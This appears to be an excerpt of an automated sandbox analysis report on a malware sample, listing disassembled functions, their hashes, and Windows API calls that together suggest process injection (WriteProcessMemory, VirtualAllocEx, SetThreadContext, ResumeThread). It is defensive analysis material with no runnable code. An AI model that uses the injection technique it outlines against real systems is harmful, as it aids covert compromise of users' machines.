                                                                                                                                                  • Instruction Fuzzy Hash: 0641CFB1C00719CFDB24DFA9C88478DBBB2BF89314F24806AD419AB255DB756A45CF90
                                                                                                                                                  Function 075D17B0 Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 954 75d17b0-75d17c2 964 75d17c5 call 75d17af 954->964 965 75d17c5 call 75d17b0 954->965 955 75d17ca-75d17d5 956 75d17ea-75d187c CreateIconFromResourceEx 955->956 957 75d17d7-75d17e7 955->957 960 75d187e-75d1884 956->960 961 75d1885-75d18a2 956->961 960->961 964->955 965->955
                                                                                                                                                  APIs
                                                                                                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 075D186F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1775333310.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_75d0000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFromIconResource
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3668623891-0
                                                                                                                                                  • Opcode ID: 65ba60141cfdf721e44b09316d1a0fd53439fcdf609ec25a5146cb8435d16312
                                                                                                                                                  • Instruction ID: 905706e80bcdacd0ca9e5813feb4f24ebd21fd8a97ba4a4d49dc803740360e00
                                                                                                                                                  • Opcode Fuzzy Hash: 65ba60141cfdf721e44b09316d1a0fd53439fcdf609ec25a5146cb8435d16312
                                                                                                                                                  • Instruction Fuzzy Hash: FB31ABB69043599FCB12CFA9D804AEEBFF8EF49320F14805AE914E7221C3359850DFA1
                                                                                                                                                  Function 07674892 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 966 7674892-76748e6 969 76748f6-7674935 WriteProcessMemory 966->969 970 76748e8-76748f4 966->970 972 7674937-767493d 969->972 973 767493e-767496e 969->973 970->969 972->973
                                                                                                                                                  APIs
                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07674928
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                  • Opcode ID: 9989fac74c102b686346e824040acaa9fad8b0197c3276668760db17142b2d13
                                                                                                                                                  • Instruction ID: eb246d833a166d2bdfb35eebbaa3beac156550daf5527eb262e87d4bf3c16469
                                                                                                                                                  • Opcode Fuzzy Hash: 9989fac74c102b686346e824040acaa9fad8b0197c3276668760db17142b2d13
                                                                                                                                                  • Instruction Fuzzy Hash: EF2128B59003599FCB10DFA9C845BDEBFF5FF48310F10842AE919A7241DB749944CBA4
                                                                                                                                                  Function 07674898 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07674928
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                  • Opcode ID: 074de0d130bbc452850163631132307abdac75cb82ccbdaf8937ea7bf1437db6
                                                                                                                                                  • Instruction ID: a7989753bc9a95d1e46ccdc618640e258fc299084e928a5081c15249ef7d38a2
                                                                                                                                                  • Opcode Fuzzy Hash: 074de0d130bbc452850163631132307abdac75cb82ccbdaf8937ea7bf1437db6
                                                                                                                                                  • Instruction Fuzzy Hash: C52127B19003599FCB10DFAAC885BDEBBF5FF48310F10842AE919A7241DB789944CBA4
                                                                                                                                                  Function 07674980 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07674A08
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                  • Opcode ID: 747970ae93a951402d58abfaaab22a5e24a2e8c50d5d13f70231d3b3a68b6931
                                                                                                                                                  • Instruction ID: e1fb48655d3c55906dead71c04e740a668a7f8f87772b557af261a1be893afa7
                                                                                                                                                  • Opcode Fuzzy Hash: 747970ae93a951402d58abfaaab22a5e24a2e8c50d5d13f70231d3b3a68b6931
                                                                                                                                                  • Instruction Fuzzy Hash: 462139B58003599FCB10DFAAD845AEEBBF5FF48320F50842AE919A7240C7349544CBA5
                                                                                                                                                  Function 076742C0 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07674346
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                  • Opcode ID: 779171aac7a1d910b630c0c23aa01d38ba969e2cfe8ee9f06800e0586b11f24b
                                                                                                                                                  • Instruction ID: 4add9a09e5e62623acc854bfb97ea10ec7d1ce9b0bdcb7632036171754f07fe4
                                                                                                                                                  • Opcode Fuzzy Hash: 779171aac7a1d910b630c0c23aa01d38ba969e2cfe8ee9f06800e0586b11f24b
                                                                                                                                                  • Instruction Fuzzy Hash: 7D2187B19003098FDB10DFAAC8857EEBFF4EF48364F14842AD419A7240CB789984CFA5
                                                                                                                                                  Function 076742C8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07674346
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                  • Opcode ID: e15d01471145d5b2c8be46513e7a02332a46a39ecac94b3c43061c71240cad2b
                                                                                                                                                  • Instruction ID: a0f2708e6847000ee98941c8668b00485f97c2c2c640a18f74ef76f3f6bf9114
                                                                                                                                                  • Opcode Fuzzy Hash: e15d01471145d5b2c8be46513e7a02332a46a39ecac94b3c43061c71240cad2b
                                                                                                                                                  • Instruction Fuzzy Hash: 482135B19003098FDB10DFAAC4857EEBFF4EF88364F54842AD559A7241CB78A944CFA4
                                                                                                                                                  Function 07674988 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07674A08
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                  • Opcode ID: c4e4e1f3c0f2f1c39a54486b0a0faf2cacc721df248f553bb8a2c3ca18c5293d
                                                                                                                                                  • Instruction ID: b5c6299745cb6077e2b528dc8224571664fa845528be7c556a6af13468deaae4
                                                                                                                                                  • Opcode Fuzzy Hash: c4e4e1f3c0f2f1c39a54486b0a0faf2cacc721df248f553bb8a2c3ca18c5293d
                                                                                                                                                  • Instruction Fuzzy Hash: 6B2139B18003599FCB10DFAAC845ADEFBF5FF48310F50842AE519A7240D7349944DBA4
                                                                                                                                                  Function 0171D6A0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0171D727
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1764512568.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1710000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                  • Opcode ID: 34fbeda17c90e4def4f865585aabc433e6c3c142214505ff9049138e9155ee02
                                                                                                                                                  • Instruction ID: c13d23941fcc25783867b2e3736e0a876c987704f69eefac3420d54b1752a6e7
                                                                                                                                                  • Opcode Fuzzy Hash: 34fbeda17c90e4def4f865585aabc433e6c3c142214505ff9049138e9155ee02
                                                                                                                                                  • Instruction Fuzzy Hash: AF21E4B59002489FDB10CF9AD884ADEFFF4EB48310F14841AE918A3350D374A944CF64
                                                                                                                                                  Function 0171D699 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0171D727
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1764512568.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1710000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                  • Opcode ID: bd3337a014ff47814aa6eb8d373adf071763249d501fae96e249ab983589fa05
                                                                                                                                                  • Instruction ID: 8206b45d8a1ee981797f15d936dd1ca210b6372e6453b31f79e3d352da59aabd
                                                                                                                                                  • Opcode Fuzzy Hash: bd3337a014ff47814aa6eb8d373adf071763249d501fae96e249ab983589fa05
                                                                                                                                                  • Instruction Fuzzy Hash: 0021E0B5900249DFDB10CFA9D985ADEFBF4EB48310F14841AE958A7250D378AA44CF64
                                                                                                                                                  Function 076747D6 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07674846
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: 218ccde2ba4829e57ac9477710e2bf89d4709ce5ae3e453a654abb503a736ec9
                                                                                                                                                  • Instruction ID: d12af05def41de3cecff96daac2bfe142f3df244dc89e582d388990993119198
                                                                                                                                                  • Opcode Fuzzy Hash: 218ccde2ba4829e57ac9477710e2bf89d4709ce5ae3e453a654abb503a736ec9
                                                                                                                                                  • Instruction Fuzzy Hash: 551159B18002499FCB10DFAAC845ADEBFF5EF48320F108419E519A7250CB359540CFA0
                                                                                                                                                  Function 076747D8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07674846
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: 4f2bec721d2c9adc98225f1cd0e8e30def4d7085c6c5ff569697a47e3d97326e
                                                                                                                                                  • Instruction ID: 055b6a8d3dfc6e856c617cb301f35ebb69850489d472ce827f88e2b379a030e8
                                                                                                                                                  • Opcode Fuzzy Hash: 4f2bec721d2c9adc98225f1cd0e8e30def4d7085c6c5ff569697a47e3d97326e
                                                                                                                                                  • Instruction Fuzzy Hash: 7D1126B19002499FCB10DFAAC845ADEBFF5EF88320F248819E519A7250CB75A944CFA4
                                                                                                                                                  Function 07674210 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                  • Opcode ID: 85cda2c35356604eba2f442ef4581815557f9dc5ec413ab80e9a88fc26eb87c4
                                                                                                                                                  • Instruction ID: 4627e6fad58c5dbc2186e050a02f5feb7d88787f024da2163eb01202ef113a9c
                                                                                                                                                  • Opcode Fuzzy Hash: 85cda2c35356604eba2f442ef4581815557f9dc5ec413ab80e9a88fc26eb87c4
                                                                                                                                                  • Instruction Fuzzy Hash: 7B1146B19003488BCB24DFAAD845BDEFFF5AB88324F20841AD519A7240CB35A944CBA4
                                                                                                                                                  Function 07674218 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                  • Opcode ID: 074861ad9d334804c60e707e3176d818c2ec28aef5f983920838a380b180e1b2
                                                                                                                                                  • Instruction ID: 95d3a1bcbd92be700e30b6b6c3d10b548e30a4c0fb2a33d8ba4bc3783c36daaa
                                                                                                                                                  • Opcode Fuzzy Hash: 074861ad9d334804c60e707e3176d818c2ec28aef5f983920838a380b180e1b2
                                                                                                                                                  • Instruction Fuzzy Hash: 021125B19003498BCB10DFAAC84979EFBF5EF88324F24881AD519A7240CB75A944CBA4
                                                                                                                                                  Function 0171AFB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0171B01E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1764512568.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1710000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                  • Opcode ID: 4bc131d005740c86fd7d9cba332ff5212b98ea9b8f8f420e6b889b4ea36b8315
                                                                                                                                                  • Instruction ID: 5c77ac7cc3fd077d58ce84199d27bd23d16f59b23ee89a4100ce5757b38e1eda
                                                                                                                                                  • Opcode Fuzzy Hash: 4bc131d005740c86fd7d9cba332ff5212b98ea9b8f8f420e6b889b4ea36b8315
                                                                                                                                                  • Instruction Fuzzy Hash: 1B110FB5C003498FDB14DF9AD844B9EFBF4AB88320F10842AD529A7210D375A545CFA1
                                                                                                                                                  Function 07673150 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 076778FD
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                  • Opcode ID: 057bae62d130dd890bbae8a235402bce93b29f8472731f14945206669c045af2
                                                                                                                                                  • Instruction ID: df063d9a24f6e8b1029bd88308db5a350d692960ea487204350ef0ac9cfe3cd6
                                                                                                                                                  • Opcode Fuzzy Hash: 057bae62d130dd890bbae8a235402bce93b29f8472731f14945206669c045af2
                                                                                                                                                  • Instruction Fuzzy Hash: 131103B5800349DFCB10DF9AD889BDEBBF8EB48320F10841AE519A7241D375A944CFA5
                                                                                                                                                  Function 0767789A Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 076778FD
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                  • Opcode ID: 34b5d32bfaff243f2cf4c5a8d497b91a9278b1e219c6b333d0dfb74faa098afc
                                                                                                                                                  • Instruction ID: 2fe0ebe0adc962aee95c36203f4194ade4cdb911c2ef19a565f22ef624d85d9c
                                                                                                                                                  • Opcode Fuzzy Hash: 34b5d32bfaff243f2cf4c5a8d497b91a9278b1e219c6b333d0dfb74faa098afc
                                                                                                                                                  • Instruction Fuzzy Hash: AA1103B58003499FCB10DF9AD845BDEBBF8EB48320F10841AD519A7240C375AA44CFA1
                                                                                                                                                  Function 0146D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1763037297.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_146d000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d53a1ca04de1113ec52332086e575b54446f16da07c36f205c38d672500ab2e9
                                                                                                                                                  • Instruction ID: bdec4b874b0ce9ffc21aaca895548b3f3db314bb0ffccb2688d2b4615949c6b7
                                                                                                                                                  • Opcode Fuzzy Hash: d53a1ca04de1113ec52332086e575b54446f16da07c36f205c38d672500ab2e9
                                                                                                                                                  • Instruction Fuzzy Hash: F621F471A04240DFDB05DF58D9C0B26BF69FB8831CF24C56AD9490A766C336D816C6A2
                                                                                                                                                  Function 0146D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1763037297.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_146d000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c2474df5a99daab420ee4d03639b20be7365290aef235e36a8a7769cc2ea38ab
                                                                                                                                                  • Instruction ID: 79e8a9094c6fe6e5a7973b3f35042d01854c0aa161920c45ba7aea983fddba8b
                                                                                                                                                  • Opcode Fuzzy Hash: c2474df5a99daab420ee4d03639b20be7365290aef235e36a8a7769cc2ea38ab
                                                                                                                                                  • Instruction Fuzzy Hash: B2212771A00244DFDB05DF44C9C0B56BF69FB98328F24C57AD94A0B366C336E856CAA2
                                                                                                                                                  Function 0147D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1763153940.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_147d000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5f07945ce9379632b0e21d08fef7925bc53684bf1e61e5990f1ee599f3ab8d96
                                                                                                                                                  • Instruction ID: 2734351cc54fa3513db264c1368ca8f1612d40ccfeaf775b8f45e69368e0ec1f
                                                                                                                                                  • Opcode Fuzzy Hash: 5f07945ce9379632b0e21d08fef7925bc53684bf1e61e5990f1ee599f3ab8d96
                                                                                                                                                  • Instruction Fuzzy Hash: BC21F571A14200EFDB05DF98D9C4B66BBA5FF84324F24CA6ED90A4B362C336D407CA61
                                                                                                                                                  Function 0147D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1763153940.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_147d000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6b9856f31ca6ea1d6e85a50bf45b1be7814fe512f0f7c333faa550d381dff17d
                                                                                                                                                  • Instruction ID: 62d1ec192a5d50919074a4b4727392a3c7462371f45bfc2b479c021d9cca4cbd
                                                                                                                                                  • Opcode Fuzzy Hash: 6b9856f31ca6ea1d6e85a50bf45b1be7814fe512f0f7c333faa550d381dff17d
                                                                                                                                                  • Instruction Fuzzy Hash: D62125B5A04280DFCB16DF58D9C4B56BBA5FF84318F24C56ED90A0B366C336D407CA61
                                                                                                                                                  Function 0147D006 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1763153940.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_147d000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 170938223c415421a8dcddc5df810cea5f761d8ac959fce4440da526d7ad42a4
                                                                                                                                                  • Instruction ID: 51da3d625a20e9dbc128c5b4d578d9dfec60786e4a697f92f35ef1dec007b03e
                                                                                                                                                  • Opcode Fuzzy Hash: 170938223c415421a8dcddc5df810cea5f761d8ac959fce4440da526d7ad42a4
                                                                                                                                                  • Instruction Fuzzy Hash: 52217F755093C08FDB03CF24D994756BF71EF46218F28C5DAD8498B6A7C33A980ACB62
                                                                                                                                                  Function 0146D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1763037297.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_146d000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                  • Instruction ID: 4f691a3eefcbdcca6220172678988635ddedad895ef3143e1c9f1a3cf52f5f81
                                                                                                                                                  • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                  • Instruction Fuzzy Hash: 8311D276904240CFDB02CF44D5C4B56BF71FB84324F24C2AAD9490B266C33AD856CB92
                                                                                                                                                  Function 0146D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1763037297.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_146d000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                  • Instruction ID: b499a477ee8621ccb7e537da6caedb5ea5629223c3f331c91fb9ed25aad9c0a2
                                                                                                                                                  • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                  • Instruction Fuzzy Hash: 5F11B476A04280CFDB16CF54D5C4B16BF71FB84328F24C5AAD9450B666C336D456CB92
                                                                                                                                                  Function 0147D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1763153940.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_147d000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                                                  • Instruction ID: 73ae22f2662ffe5cbe09670657bf277852219c176937d501dbdea5e8fde94a77
                                                                                                                                                  • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                                                  • Instruction Fuzzy Hash: ED11A975904280DFDB12CF54C5C4B16BBA2FB84224F28C6AAD8494B3A6C33AD40ACB61

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:0.2%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                  Signature Coverage:0%
